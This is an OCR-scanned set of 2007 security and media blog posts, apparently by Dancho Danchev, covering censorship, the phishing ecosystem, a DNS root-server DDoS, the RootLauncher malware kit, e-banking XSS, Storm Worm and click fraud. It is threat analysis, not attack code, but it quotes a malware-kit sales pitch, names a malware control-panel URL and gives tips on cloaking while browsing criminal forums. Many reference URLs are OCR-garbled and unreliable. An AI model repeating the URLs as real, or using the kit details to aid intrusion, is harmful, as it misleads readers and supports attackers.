26. http://www.forbes.com/20Q6/12/14/securitv-stalk- 
surveillance-tech-secuntv-cx II 1214stalk slide.html 

27. http://www.techcrunch.com/2007/02/14/text-of-email-to- 
all-vahoos/ 

28. http://www.fas.or a /blo a /ssp/2007/02/post 2. oho 

29. http://www.redherrin g .com/Article.aspx?a = 21323 

30. http://www.techcrunch.com/2007/02/16/ a oo a le-to-bu v- 
adscape-for-23-million/ 
















































31. http://www.iht.com/articles/ap/2007/02/16/america/NA- 
GEN-US-Yahoo-Stanford. php 

32. http://www.ft.com/world/us/rendition 

33. http://ddanchev.blo as pot.com/2006/09/secret-cia- 
prisons.html 
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My Feed is on Fire, My Feed is on Fire! (2007-02-18 
04:31) 

I've never had so many people [l]connected to me, perhaps 
it's the consequence of[2] Feedburner detecting Google 

Readers as of this week, and yes the quality of the posts 
themselves. Here's an [3]interesting opinion on the 
frequency of blog posting, I especially like the author's 
understanding of the readers' loyalty towards a blog. My 
[4]ROI is still positive whatsoever - [5]part two of Forrester's 
series is also worth the read. 

1 . 

http://feeds.feedburner.com/DanchoDanchevOnSecuritvAnd 

NewMedia 

2 . 

http://blo a s.feedburner.com/feedburner/archives/2007/02/th 
e a oo a le effect. php 

3. 

http://www.mpdailvfix.com/2006/06/w_whv_blo a_ post_freq u 
enev does.html 






















4. http://ddanchev.blo as pot.com/2006/10/return-on- 
investment-of-blo a g mg .html 

5. 

http://blo a s.forrester.com/charleneli/2007/01/new roi of bio 
g .html 
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Beyond Traditional Advertising Packages (2007-02-18 
04:58) 

[^Differentiate your value proposition or cease to exist. And 
hey, that's on Madison Avenue : 

" As a startup carrier that hadn't yet hired a pilot, Virgin 
needed more than just slogans and 30-second com¬ 
mercials. That's about when Anomaly, a two-year-old startup, 
brought a pitch that sounded more like a takeover 

bid: Carl Johnson, Anomaly's 48-year-old co-founder, hauled 
out plans to design the interiors of Virgin's new A320s, 

fashion the flight attendants' uniforms, and create the 
content for a pay-per-view seat-back entertainment system. 11 

You may also find [2]the best and [3]worst Super Bowl - the 
U.S ad industry's favorite playground - ads enter¬ 
taining. Meanwhile, Pepsi is anticipating the [4]DIY 
marketing culture and is asking everyone to help them 
[ 5 ] bu i Id 

their next billboard on Times Square. When advertising does 
its job millions of people keep theirs, isn't it? 









1. 

http://monev.cnn.com/ma a azines/business2/business2 archi 
ve/2007/02/01/8398979/index.htm?oostversion = 2 007021 
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2 . 

http://blo a s.business2.com/madisonavenuewest/2007/02/to p 
ten best ad l.html#more 

3. 

http://blo a s.business2.com/madisonavenuewest/2007/02/to p 
ten worst a l.html#more 

4. http://ddanchev.blo as pot.com/2006/Q4/div-marketin a- 
culture.html 

5. http://www.thisisthebe a innin a .com/ 
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Profiling Sergey Brin (2007-02-18 05:45) 

[l]Great weekend reading : 

" Stepping through the sliding glass door into their office is 
like walking into a playroom for tech-savvy adults. 

A row of sleek flat-screen monitors lining one wall displays 
critical information: email, calendars, documents and, 

naturally, the Google search engine. Assorted green plants 
and an air purifier keep the oxygen flowing, while 

medicine balls provide appropriately kinetic seating. 

Upstairs, a private mezzanine with Astroturf carpeting and 
an 





















electric massage chair afford Sergey and Larry a comfortable 
perch from which to entertain visitors and survey the 

carnival of innovation going on below. And there is ample 
space for walking around, which is absolutely essential for 

Sergey, who just can't seem to sit still. 11 

A story that proves for yet another time that nothing's 
impossible, the impossible just takes a little while. Here are 
some photos from [2]Google's NYC headquarters, guess who 
likes to spoil its employees - sorry Googlers - most 

from all the tech companies these days? Say Google again! 

1. http://www.rnonnentnna a .com/Exclusive/2007/2007- 
02/200702-Bri nFeature.html 

2 . 

http://www.informationweek.com/ a alleries/showGaller v.i html 

?a allervlD=4 
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Cuba's Internet Dictatorship (2007-02-19 23:08) 

And you thought [ljpeople in China suffer from the lack of 
free speech expression. Here's the [2]cheap version of 

the great firewall of China, this time in Cuba : 

" Cuba built an Internet search engine that allows users to 
trawl through speeches by Cuban leader Fidel Cas¬ 
tro and other government sites, but does not browse Web 
pages outside the island. 










Cubans cannot buy computers and Internet access is limited 
to state employees, academics and foreigners. Cubans 

line up for hours to send e-mails on post office terminals that 
cannot surf the World Wide Web. Passwords are sold 

on the black market allowing shared Internet use for limited 
hours, usually at night. 11 

With Fidel Castro now seriously ill, the speeches will sooner 
or later turn into historical ones, the question is, 

which think-tank across the world would come closer in its 
predictions of [3]the situation in a post-Castro Cuba next 

to reality? On the other hand the U.S is starving Cuba's 
bandwidth hunger to death, and considering their inability 

to invest in alternative sources for connectivity, the extend 
of degrading the quality of their Internet connectivity is 
almost unbeliavable as : 

11 Cuba is forced to use a costly satellite channel with only 65 
megabytes per second (mbps) for upload and 

124 mbps for download, he said. 11 

Even a France Telecom customer that has upgraded service 
to [4]Fiber@Flome will be able to ping-to-death 

Cuba's entire academic community. And while [5]Cuba 
recently blamed the CIA for digital espionage, it would 

take them unnecessary amount of time to download 
sensitive material remotely given Cuba's bandwidth capacity. 

Several other interesting events in case you remember were 
when [6]Kyrgyzstan got cut off from Internet by hacker 



attack, and when [7]Zimbabwe's Internet was shut down 
because they forgot the pay their bill. Bandwidth matters, 

depending on [8]the perspective of course. 

The most recent report on [9]Censorship in Cuba is also 
worth going through : 

11 To visit websites or check their e-mail, Cubans have to use 
public access points such as Internet cafes, uni¬ 
versities and "Youth computing centers” where it is easier to 
monitor their activity. Then, the Cuban police has 

installed software on all computers in Internet cafes and big 
hotels that triggers an alert message when "subversive” 

key-words are noticed. 11 

The only way to [10]undermine censorship is to talk about it 
- and mock it. 
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1. http://ddanchev.blo as pot.com/2007/02/censorship-in- 
china-open-letter.html 

2 . 

http://todav.reuters.com/news/articlenews.aspx? 
tv pe=internetl\lews&storvid = 2 007-02- 
18T0244Q1Z 01 N15177571 

RTRUKOC 0 US-CUBA-INTERNET.xml 


3. 

http://www.rand.or g/ pubs/technical_reports/2005/RAND TR1 
31.pdf 

















4. http://slashdot.or g /articles/06/07/26/127205.shtnnl 


5. 

http://www.ahora.cu/en a lish/SECTIQNS/national/2007/februa 

r v/14-02-07.htm 

6. htt p://209.85.129.104/search? 

g = cache: BNVvDTIa 1 00 1 :www.osoint.com/text/d/3488924/+K v 
r g vzstan+ a ot+cut+off+fr 

om+lnternet&hl=en&ct=clnk&cd = l 


7. http://news.zdnet.com/2100-9588 22-6117553.html 

8. http://ddanchev.blo as pot.com/2007/02/enner aina -ddos- 
attack-trends.html 


9. http://www.rsf.or a /article. ph p37id article= 19335 

10. http://irrepressible.info/ 
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The Phishing Ecosystem (2007-02-21 11:15) 

Phishing is the [l]efficient case of online social engineering. 
With the ease of sending phishing emails thanks to 

[2]malware infected PCs - [3]spamonomics 101 - as well as 
many other techniques for creating the pages and 

forwarders phishers use to trick users - it's indisputable how 
much more profitable phishing is next to spam. 

This is perhaps the most [4]detailed summary of the 
emerging ecosystem I've read in a while. It walks the 

























reader through the process of acquiring the resources for the 
attack and tracking down the results and provides 


overview of how malware authors, phishers and spammers 
work hand to hand due to the pressure put on their 

actions by the industry and, of course, the countless third- 
party researchers. Here's a summary : 


[5]Get an email list 

- Develop the attack 

- Locate sites to send phishing emails from 

- [6]Locate sites to host the phishing site 

- Launch the attack 

- Collect results 11 

Around the industry, security researchers are again 
signalling the ongoing use of popular sites such as 
[7]MySpace for hosting phishing pages, [8]phishers are 
going Web 2.0 and starting to use [9]Google Maps, and 
seems like Castle Cops 

the anti-phishing community witnessed [10]a demonstration 
of DDoS bandwidth power which is definitely the result 

of the [11] 

[12]consolidated anti-phishing initiative that they manage to 
keep on expanding. Moreover, yet another evidence 



of the developing ecosystem is the fact that [13]spam and 
[14]defaced sites aren't what they used to be, namely 
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are turning into malicious attack vectors. Despite that 
everyone's claiming the commercialization of this entire 
ecosystem, [15]hacktivism is not dead! 

The "best" is yet to come, and let's hope a more 
[16]suspicious common sense on the users' part too. 

1. http://en.wikipedia.or g /wiki/Rock Phish 

2. http://www.linuxsecuritv.com/docs/malware-trends.pdf 

3. 

http://radar.oreillv.com/archives/2007/01/spamonomics 101. 
html 

4. 

http://www.secureitconf.com/QLD/2006/presentations/54 Sec 
urelT Preso V2. ppt 

5. http://ddanchev.blo as pot.com/2007/01/inside-ennail- 
harvesters-confi a uration.html 

6. http://ddanchev.blo as pot.com/20Q6/12/phishin a -domains- 
hostin a -multiple.html 

7. 

http://news. a oo a le.com/news/url?sa=t&ct=us/Q- 
0&fp = 45dc254b2eeQf5d9&ei = CAPcRcDwH5f8wOGGr- 
iFB0&url = http%3A/ 

/www.cbc.ca/technolo a v/storv/2007/02/20/tech-m vs pacephi 





































8. http://www.computerworld.com/action/article.do? 
command=viewArticleBasic&taxonomvName=securitv&artic 
I eld = 901 


1589&taxonomvld = 17&intsrc=kc_to o 

9. http://www.websense.com/securitvlabs/alerts/alert. php? 
AlertlD=741 


10. http://www.castlecops.com/article-6745-nested-0-0.html 

11. http://www.castlecoos.com/oirt 

12. http://www.castlecoos.com/oirt 

13. http://isc.sans.or a /diarv.html7storvid = 2283 

14. http://www.websense.com/securitvlabs/blo a /blo a.php? 
Blo a lD=109 

15. http://ddanchev.blo as pot.com/2006/Q5/current- 
emer aina -and-future-state-Qf.html 

16. http://ddanchev.blo as pot.com/2006/12/top-ten-scams-of- 
2006.html 
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Korean Zombies Behind the Root Servers Attack 
(2007-02-22 17:32) 

More details on the recent DDoS attacks on the DNS root 
servers emerge, seems like [l]the attacks originated from 

Sourth Korean infected PCs, but were orchestrated from a 
host server in Coburn, Germany : 






































" Citing data from the North American Network Operators' 
Group, the Korean government confirmed 61 per¬ 
cent of the problematic data was traced to South Korea. Yet, 
the Ministry of Information and Communication flatly 

rebuffs the suspicion that Korea was the main culprit behind 
the cyber attacks. "We learned a host server in Coburg, 

Germany ordered a flurry of Korean computers to stage DOS 
assaults on the root servers," said Lee Doo-won, a 

director at the ministry. "In other words, Korean computers 
affected by viruses made raids into the root servers as 

instructed by the German host server. Many of our computers 
acted like zombies," Lee said. 11 

In a [2]spoofable IPv4 Internet packet's authenticity is [3]the 
most common flaw exploited on [4]the front 

lines. The article points out that 61 % of the problematic 
data came from South Korea, and it would be logical to 

conclude the other 39 % came from Chinese and U.S based 
infected PCs, and while we can argue which country has 

the largest proportion of insecure end users - or insecure end 
users with access to huge bandwidth - that shouldn't 

be the point, but how ISPs should start considering how to 
stop the malicious traffic going out of their networks, 

compared to their current mindset of outside-to-inside 
network protection. 

A battle lost for the botnet masters in their futile attempt to 
shut down three of the root servers, and a battle 



won for South Korea as they will definitely take this wake up 
call seriously. Meanwhile, [5]S. Korea's CERT offers lots of 
interesting research reports on the local situation, 
particularly their latest [6]lnternet Incident Trend Report. 

Graph courtesy of the [7]ANA Spoofer Project. 

1 . 

http://times.hankooki.com/l paa e/tech/200702/kt200702191 

6025512350.htm 

2. http://ddanchev.blo as pot.com/2006/02/current-state-of-i p- 
s poofin a .html 

3. http://ddanchev.blo as pot.com/2006/Q4/on-insecurities-of- 
internet_13.html 

4. http://ddanchev.blo as pot.com/2006/01/how-to-secure- 
internet.html 


5. http://www.krcert.or.kr/en a lish www 

6. http://www.krcert.or.kr/en a lish www/inc/down load . iso? 
filename=070111 KorealnternetlncidentReport Dec2006. pd 

f 

7. http://spoofer.csail.mit.edu/ 
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Image Blocking in Email Clients and Web Services 
(2007-02-22 18:06) 

Handy graphs and best practices on the state of [ljdefault 
remote image loading in desktop and online email clients 























- a problematic issue from a security point of view, and a 
marketing heaven from an advertising perspective : 

" Every client has its own default settings regarding 
displaying/hiding images. And while most email clients 

have a setting to turn images on or off, some offer 
conditional settings which are contingent upon known 
senders or 

other factors. The following table outlines the default 
settings of popular desktop- and webmail-clients. 11 

Sometimes a spam email isn't sent with the idea to trick 
someone believe into something, but to act as a veri¬ 
fication of that email's existence in the form of remote image 

- [2]web bug - loading, and yes it could also act as a 

redirector to pretty much anything malicious. [3]Go through 
related posts in case [4]you're interested, and also see 

a common [5]trade-off image spammers face. 

1 . 

http://www.campai a nmonitor.com/blo a /archives/2007/02/cur 

rent_conditions_and_best_pr_l.html 

2. http://www.eff.or a /Privacv/Marketin a /web bu a .html 

3. http://ddanchev.blo as pot.com/2006/Q9/email-spam- 
harvestin a -statistics.html 

4. http://ddanchev.blo as pot.com/20Q6/10/real-time-spam- 
outbreak-statistics.html 

5. http://ddanchev.blo as pot.com/2006/06/over-perfornnin a- 
s pammer.html 
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The RootLauncher Kit (2007-02-23 01:59) 

After providing more insights on the [l]WebAttacker Toolkit 
and the [2]Nuclear Grabber, in this post I'll discuss the 

RootLauncher, a release courtesy of the same group behind 
WebAttacker. Something else worth mentioning is that 

a large percentage of the sites I'm monitoring are starting to 
use authentication, and on a trust-basis login access, 

perhaps it's due to the enormous coverage recent 
"underground" releases, namely phishing kits etc. got in the 
mainstream media. Therefore I'm doing my best to get as 
much information - and screenshots - before it dissapears 

and will blog on these releases as soon as my schedule 
allows me to. For instance, several months ago you could 

easily see over 50 publicly available control panels for the 
WebAttacker toolkit, now there're only several available 

through Google. The same goes for RootLauncher. 

The RootLauncher kit is advertised - Rusian to English 
automatic translation - as follows : 

" Just, we can offer you 3-version - Downloader- 
designed RootLauncher for the hidden load arbitrary 

WIN32 Exe-faila from a remote resource, followed by the 
launch of the file on the local hard disk. Obhodit all 


protection is not determined by any AV-Do not see fairvollah 
- Flexible settings - Periodic updates and supplements 

may download up to five exe files. Our team is not at the 
same point and develops all bolshe-bolshe for you dear 

friends services available to them closer you will be able to 
on our official website. We are also looking for people 

interested in partnership with us. 11 

And while it's supposed to be nothing more then an average 
downloaded these "average downloaded" are 

actually starting to standardize features in respect to 
statistics and compatibility with other toolkits and malicious 
software. 

In a previous post at [3]WebSense's blog, they came across a 
web panel showing that the "total number of 

unique launchers is 155" now count these as infected PCs, 
but as you can see in the image attached, the sample 

could be much larger. This one I obtained from the following 
URL : http://www.inthost7.com/cgi-bin/rleadmin.cgi 

which is of course down, but was listing 1013 launchers 
already, here's [4]an analysis of this very same URL. 

[5]IP cloaking when browing such sites and forums is 
important in order for you to remain as anonymous as 

possible. If you're on a Russian site make sure you're a 
Russian domain, if you're on a Chinese site make sure you're 
a Chinese domain, and most importantly don't directly 
translate through Google or Altavista, but copy and paste 
what's 



interesting to you so that you wouldn't let someone wonder 
why would a Russian domain translates a Russian text to 

English. Imagine the situation where security vendors browse 
them through their securityvendor.com subdomains, 

the results will follow shortly - everything dissapears. 
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In respect to the WebAttacker, the kit is still widely used but 
the people using and updating it are starting to 

prevent Google from crawling and caching the control 
panels, which makes it harder to keep track of the sites in an 

[6]0SINT manner - my modest honeyfarm keeps me 
informed on URLs of notice though. Here's one of the very 
few 

instances of a [7]Web-Attacker Control Panel still available at 
Google. Here's [8]an analysis of the source code of the Web- 
Attacker kit as well - and I thought I'm going full disclosure. 
More details on various newly released packers, 

multi-exploit infection toolkits, and standardized statistics 
with all the screenshots I've managed to obtain will follow 
next week. 

Taking into consideration the big picture - like you should - 
the release and automation of phishing/exploit 

kits and lowering the entry barriers for script kiddies to 
generate enough noise to keep the real puppet masters safe, 
or at lease secretly pull the strings. I'd rather we operate in 


the time when launching a phishing attack required much 
more resources than it requires today. 

1. http://ddanchev.blo as pot.com/2006/Q4/wild-wild- 
under a round 25.html 

2. http://ddanchev.blo as pot.com/2006/ll/nuclear- a rabber- 
toolkit.html 

3. http://www.websense.com/securitvlabs/blo a /blo a.php? 
Blo a lD=107 

4. http://se a uridad.intemautas.Or g /html/l/930.html 

5. http://ddanchev.blo as pot.com/2005/12/ip-cloakin a -and- 
competitive.html 

6. http://ddanchev.blo as pot.com/2006/09/benefits-of-open- 
source-intelli a ence.html 

7. 

http://209.85.129.104/search? 
g = cache:hT2IAVK3eMI I :im a .secondsite2.com/c a h 
bin/ie0604.c a i + intitle:%22Web-A 

ttacker+Control%22&hl = en&ct=clnk&cd = 2 


8. http://www.websense.com/securitvlabs/blo a /blo a.php? 
Blo a lD=94 
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Characteristics of Islamist Websites (2007-02-23 
02:19) 









































Excellent and recent analysis of [l]the most common 
characteristics of islamist websites published by the Middle 

East Media Research Institute : 

11 The media platform favored by the Islamist organizations is 
the Internet, which they prefer for several reasons: firstly, for 
the anonymity it allows - anyone can enter and post to a site 
without divulging personal information; secondly, due to the 
medium's availability and low cost - all that is required is a 
PC and an Internet connection; and thirdly, due to the ability 
to distribute material to a great number of people over a 
wide geographic area in a matter of seconds. 

The organizations use the Internet mainly for propaganda 
and indoctrination, but also for operational military needs. 

This paper will discuss the distinguishing characteristics of 
the websites of Islamist organizations and their supporters; 
the various online activities through which terrorist 
organizations assist the mujahideen on the ground, both 
militarily and, especially, with propaganda; and the Internet 
polemics that these organizations conduct vis-a-vis their 
enemies. " 

The majority of articles you've probably read are doing 
nothing more than scratching the surface of the topic. 

Fundraising, propaganda, communications within 
steganographic images and the use of plain simple 
encryption, or 

the thriller type of scenarious where entire food supply 
chains get remotely controlled or where your next dose of 

Prozac may be a little bit more dangerous than it actually is, 
of course because terrorists may have the capacity to 



do so. In the post 9/11 world terrorist experts started 
emerging from all over the globe, universities realizied the 

potential and opened up educational courses, even degrees, 
security companies started pitching their offers with 

cyberterrorism in mind, and last but not least the 
mainstream media doesn't seem to stop piggybacking on 
historical 

events while actually doing terrorists the biggest marketing 
favour of them all - the media echo effect. Someone 

blows him or herself up in the Western world, and everyone 
forgets about all those little things people die from if you are 
to go through you local statistical institute and see the death 
rates, but starts requesting more information on 

what is your government doing to prevent this from 
happening. But compared to the same situation in the Middle 

East - it's part of the daily life, nothing ground-breaking 
besides a bunch of low lifes radicalizing online, looking for 
masters of brainwashing mentors, and most importantly 
looking for a mighty excuse for their pathetic existence. A 

terrorist organization [2]uploads a video of shooting a soldier 
or anything that will shock someone's who's still getting 
shocked by the The Texas Chainsaw Massacre - boring try the 
[3]Evil Dead series - and people become so outraged 

and get this feeling of being helpness in the situation that 
fear compared to reality drives the entire model of terrorism. 

Terrorism is successful as both, a [4]government's doctrine 
for re-election, and as a term mainly because it's a 



very open topic term these days. In some countries 

[5] glorifying terrorism is illegal, but if you let you 
government 

convince you that it's not terrorizing you to protect you from 
an event that from a statistical point of view doesn't 
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happen that very often, I think I will lose you as a reader of 
this blog. The world is losing the war on terrorism because 
it's rational, and terrorists aren't rational. In the very same 
fashion that companies don't compete with 

companies but with networks, a network that's anything but 
irrational isn't going to be beated by a network that's 

too bureaucratic and still waging departamental wars. 

[6] Go [7]through [8]many [9]of [10]my [ll]previous 
[12]posts on [13]cyberterrorism, a relevant [14]collection 

of cases, and [15]through the research which as a matter of 
fact is full with practical examples of various sites. 

1. http://memri.or a /bin/articles.c ai? 

Pa a e=archives&Area = ia&ID=IA32807 

2. http://www.foxnews.eom/storv/Q . 2933 . 251398 . 00.html 

3. http://en.wikipedia.or g /wiki/The Evil Dead 

4. 

http://www.networkworld.com/columnists/2006/121806schw 

artau.html 

5. 

http://www.boin a boin a .net/2007/02/15/ a lorifvin a terrorism.h 



















tml 


6. http://ddanchev.blo as pQt.com/2006/12/current-state-Qf- 
internet ihad.html 

7. http://ddanchev.blo as pot.com/2006/05/techno- 
imperialism-and-effect-of.html 

8. http://ddanchev.blo as pot.com/2006/08/cvber-terrorisnn- 
communications-and 22.html 


9. http://ddanchev.blo as pot.com/2007/Q2/forensic- 
examination-of-terrorists-hard.html 


10. http://ddanchev.blo as pot.com/2006/06/trackin a -down- 
internet-terrorist.html 


11. http://ddanchev.blo as pot.com/2006/Q5/techno- 
imperialism-and-effect-of.html 

12. http://ddanchev.blo as pot.com/2006/Q8/ste a ano araphv- 
and-cvber-terrorism.html 

13. http://ddanchev.blo as pot.com/20Q6/12/di a ital-terrorism- 
and-hate-2006-cd-rom.html 


14. http://del.icio.us/DDanchev/Cvberterrorism7setcount=50 

15. http://memri.or g /bin/articles.c ai? 

Pa a e=archives&Area = ia&ID=IA32807 
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A Review of SiteAdvisor Pro (2007-02-23 03:09) 

During 2006, the company [l]popped out like a mushroom in 
front of my desktop as you can read in a [2]previous 






































post, and on its acquisition [3]two months later. In the 
typical detailed and extensive CNET Reviews style, here's 

what they have to say about [4]SiteAdvisor Plus : 

11 SiteAdvisor Plus includes the ability to report suspicious 
links within IM and e-mail and can automatically 

block access to flagged sites. However, SiteAdvisor Plus lacks 
additional configuration options and doesn't work with 

Firefox or Opera, or with branded browsers from AOL and 
other services. In addition, the paid version on Internet 

Explorer appears to conflict with the free version installed on 
Firefox. Overall, we experienced greater flexibility and fewer 
hassles when using the free Netcraft toolbar, and we also 
liked the proactive nature of Linkscanner Pro better. 11 

The niche filling competition is also reviewed, namely 
[5]LinkScanner Pro. Niche filling in respect to the real¬ 
time sandboxing of results, a concept I'm sure is on its way at 
SiteAdvisor, or else [6]the community has a lot to 

[7]contribute as always. SiteAdvisor are however truly 
embracing a Web 2.0 business model on all fronts, and it's 

perhaps my favorite case study on commercializing an 
academic idea during the last year. 

1. http://ddanchev.blo as pot.com/2006/06/consolidation-or- 
startups- PQP Pin a -out.html 

2. http://ddanchev.blo as pot.com/2006/02/look-whos- a onna- 
cash-for-evaluafin a .html 











3. http://ddanchev.blo as pot.com/2006/04/spottin a -valuable- 
investments-in.html 


4. http://reviews.cnet.com/SiteAdvisor_Plus/4505-3667 7- 
32329848.html 

5. http://reviews.cnet.com/Linkscanner_Pro/4505-3667_7- 
32329266.html 

6. http://www.s pvb ve.or a/ 

7. 

http://www.xnos.or a /fileadmin/labs/wef/White pa per WEF Aut 
omatic Drive Bv Download Detection_En a lish.pdf 
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Fake Terror SMS Sent to 10,000 People (2007-02-27 
15:39) 

This is serious, and while [l]it was a hoax, it could have had 
much more devastating results acting as a propagation 

vector for malware, a phishing attack as the social 
engineering potential here for anything [2]offline or online is 
huge 


" About 10,000 commuters who subscribe to the train 
operator's timetable messaging service received the 

threatening text message on Friday night after hackers broke 
into the system. The message, sent after 9.30pm 



















(AEDT), reads: ALLAHU AKBR FROM CONNEX! our inspectors 
Love Killing people - if you see one conning, run. Want 

to bomb a train? they will gladly help. See you in hell! 


ALLAHU AKBR means M [3]God is the Greatest". Now which 
God is the greatest I'll leave up to your religious 

beliefs, though the Muslim motives are spooky and the 
attack directly undermines the citizens' confidence in their 

government's ability to protect them - what I anticipate next 
are articles on how terrorists take control over the 

trains. I'm very interested in who's having acccess to the 
company's feature, and most importantly to what extend 

are they outsourcing, or was it an insider that used someone 
else's terminal to send the message? Here's a related 

post on the interest of various governments into developing 
an [4]SMS disaster alert and warning systems and the 

related security/impersonation problems to consider. 

1 . 

http://www.zdnet.com.au/news/securitv/soa/Connex SMS ha 
ekin g underorobe/0 . 130061744 . 3392 7 3819 . 00.htm 

2. http://connexwhin a er.blo as pot.com/2007/02/who-hacked- 
pd p-lls.html 

3. http://theeid.d a reetin a s.com/eid-ul-fitr-traditions/ 

4. http://ddanchev.blo as pot.com/2006/09/vulnerabilities-in- 
emer a encv-sms.html 
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XSS Vulnerabilities in E-banking Sites (2007-02-27 
16:14) 

The other day I came across to this summary with direct 
examples of various [1]XSS vulnerabilities at E-banking sites, 
and I wonder why the results still haven't gotten the 
necessary attention from the affected parties : 

11 First of all you should realize, that this is not the first time, 
that we are doing such a website. The last time we hit a vast 
number of sites, mostly german banks. We have shown, that 
those sites, that should be most secure are 

not! Many visitors saw the site and also the banks seemed 
quite upset, nevertheless they fixed the problems, that 

we pointed at. You can check out the archive at: [2][English 
version] and [3][German version] . This project has been 

done as a direct reaction to the poll done in austria not long 
ago and which was reported at [4][this article] from 

Heise. For the english readers of you, this article basically 
says, that 9 of 10 people using online banking in austria 
trust the security, that their banks offer. 11 

The best phishing attack at least from a technical 
perspective is the one that's using a vulnerability in the tar¬ 
geted's brand site to further improve its truthfulness, and 
believe it or not, certain phishing attacks are actually 

loading images directly from the victim's sites instead of 
coming up with the phish creative on their own. 


1. http://baseportal.com/baseportal/phishmarkt/at 

2. http://baseportal.com/baseportal/phishmarkt/en 

3. http://baseportal.com/baseportal/phishmarkt/de 

4. http://www.heise.de/securitv/news/meldun a /83796 
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Credit Card Data Cloning Tactic (2007-02-27 17:32) 

First of all, she's too cute for someone to even have the 
slightest suspicion, and to be honest the posers paying their 
coffee with a credit card deserve it - it leaves them without 
the opportunity to leave a change at least that's what 

they've thought. 

[EMBED] 
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Storm Worm Switching Propagation Vectors (2007-02- 
28 16:40) 

The storm [l]started with mass mailings, then the malware 
switched to [2]IM propagation, and now the [3]infected 

PCs are further spreading through blog and forum posts : 

11 But the twist comes when these people later post blogs or 
bulletin board notices. The software will insert 

into each of their postings a link to a malicious Web site, said 
Alperovitch, who rates the threat as "high." We haven't seen 
the Web channel used before," he said. "In the past, we've 

















seen malicious links distributed to people in a user's address 
book and made to look like it's an instant message coming 
from them. 11 

The smart thing is that compared to situations where 
malware authors have to figure how to bypass the fo¬ 
rum's [4]CAPTCHA or [5]mass spam and generate new blogs, 
in this case the (infected) end user is authenticating 

both himself and the malware. Here are some [6]malware 
stats on social networking sites worth going through as 

well. 

UPDATE : Symantec has [7]a nice analysis with some 
screenshots of this variant. 

1. http://ddanchev.blo as pot.com/20Q7/01/social- 
en a ineerin a -and-malware.html 

2. http://www.eweek.eom/article2/0 . 1759 . 2095572 . 00.as p? 
kc=EWRSS03129TXlK0000614 

3. 

http://news.com.com/Storm-l- Worm+variant+tar a ets+blo as 
%2C+bu I letin + boards/2100-7349 3-6162623.html 

4. http://ddanchev.blo as pot.com/2006/08/but-of-course-its- 
pleasant-transaction.html 

5. http://ddanchev.blo as pot.com/2006/ll/blo aos phere-and- 
s plo a s.html 

6. http://ddanchev.blo as pot.com/2006/08/nnalware-statistics- 
on-social.html 
























7. 

http://www.svmantec.com/enterDrise/securitv resoonse/webl 
oa /2007/02/mespam infectin g web 20 with l.html 
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Social Engineering the Old Media (2007-02-28 16:56) 

While the [l]Rules of the Thirds are partly in place, the 
floating fragnance and his depressed look provide some 
clues. 

[2] The story is very interesting though as it has happened 
before. As Tim Nudd comments on Adfreak : 

11 In Switzerland, it doesn't take much to be in a Gucci ad 
campaign. You photograph yourself naked, add a 

perfume bottle and the Gucci logo, send it to a weekly paper, 
and have them bill Gucci directly for the $50,000. 

[3] They'll fall for it every time . 11 

How it could have been prevented? Coordinating the 
campaign with local Gucci representatives, ensuring pay¬ 
ment is processed before the ad is featured, or let's just say 
look at his face to figure out he's anything but a 

professional model. 

1. http://www.aeal.kl2.ia.us/lois/ruleofthirds.html 

2 . 

http://adweek.blo a s.com/adfreak/2007/02/swiss pa per oub. 
html 














3. 

http://www.editorandoublisher.com/eandp/news/article dis ol 
av.is p?vnu content id = 1003551020 
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AdSense Click Fraud Rates (2007-03-01 17:02) 

Google's single most profitable revenue generation source 
AdSense has always been under fire for click fraud and 

most importanly the company's been under public scrutiny 
for better communicating their efforts on fighting the 

problem. Third party companies emerged and started filling 
the niche by coming up with click fraud analytics 

software so that Google's major customers, even the small to 
mid-size business could take advantage of an auto¬ 
mated way to analyze click anomalies. But how prelevant is 
the problem really? Should the discussion always orbit 

around Google's efforts, to its customers' vigilance and 
education on detecting click fraud, or should it shift to im¬ 
proving the communication between all participants, namely 
Google, its customers and the click auditing companies? 

According to [l]the most recent click fraud rate from Google 
- click fraud is only 0.002 % of all clicks. Danny 






Sullivan has an in-depth analysis of the topic, emphasizing 
on the importance of detected click fraud rates : 

" Finally, we have a click fraud rate [2]from Google itself : 
less than 0.02 percent of all clicks slip past its filters and are 
caught after advertisers request reviews. That low figure is 
sure to bring out the critics who will 

disagree. Below, more about how Google comes up with the 
figure plus some click fraud fighting initiatives it plans 

to implement later this year.Why release this figure now, 
when many have wanted it for literally years? 

"We've been working to be more transparent and informative 
on the issues related to click fraud. Recently, this 

metric has been something advertisers have specifically 
asked for and we agree that is useful in describing the scope 

of the problem. Further, it is something we measure and use 
to monitor the performance of our click fraud detection 

systems," said Shuman Ghosemajumder, business product 
manager for trust & safety at Google. " 

During [3]July, 2006 Google commissioned [4]a third-part 
analysis of their efforts to fight click fraud you will definitely 
find informative, and here's [5]another research taking the 
discussion beyond the typical botnets and human clickers 

perspective. There are also [6]false click fraud positives to 
keep in mind as shown in this analysis. 

Stats courtesy of [7]Clickfraudindex who by the way 
[8]started blogging recently. 

1. http://searchen a ineland.com/070301-000001. php 




2. http://adwords.blo as pot.com/2007/Q2/invalid-clicks- 
a oo a les-Qverall-numbers.html 


3. http://ddanchev.blo as pot.com/2006/07/latest-reoort-on- 
click-fraud.html 


4. http:// a oo a leblo a .blo as pot.com/pdf/Tuzhilin Reoort.pdf 

5. http://www.indiana.edu/%7Ephishin a/pa pers/ a andhim.pdf 

6. http://www. a oo a le.com/adwords/ReportonThird- 
PartvClickFraudAuditin a.pdf 
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7. http://www.clickfraudindex.com/ 

8. http://www.cfnblo a .com/ 
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Real Time Censored URL Check in China (2007-03-02 
17:20) 

While the original initiative for [l]a real-time URL censorship 
check in China was originally realized as a project by 
Jonathan Zittrain and Benjamin Edelman couple of years ago, 
it's great to see someone continued what they've 

started and came up with the [2]GreatFirewallofChina.org : 

11 Aim of this website is to be a watchdog and keep track of 
which and how many or how many times sites are 

censored. Help to keep the censorship transparent. Each 
blocked website will automatically be added to the great 


























firewall on the homepage. 11 

What you should keep in mind is that despite of the 
capability for URL checking, from a technical perspective 

the[3] censorship in China is much more sophisticated. 
Realizing that URLs themselves can be obfuscated, proxies 

and many other alternatives such as TOR for instance used, 
dynamic page content scanning for [4]subversive 

keywords and the same technique used for [5]sms messages 
is what I have in mind. For instance, according to 

the GreatFirewallofChina, blogspot.com is not blocked in the 
country, which doesn't mean a Taiwan independence 

related blog's content wouldn't get filtered. Moreover, it's 
perhaps even more disturbing to see various search 

results from a Chinese user's perspective, than figuring out 
whether an URL is blocked or not only. Flere are two 

[6]great screenshots confirming the [7]twisted reality, and a 
recent summary of [8]situation in China. 
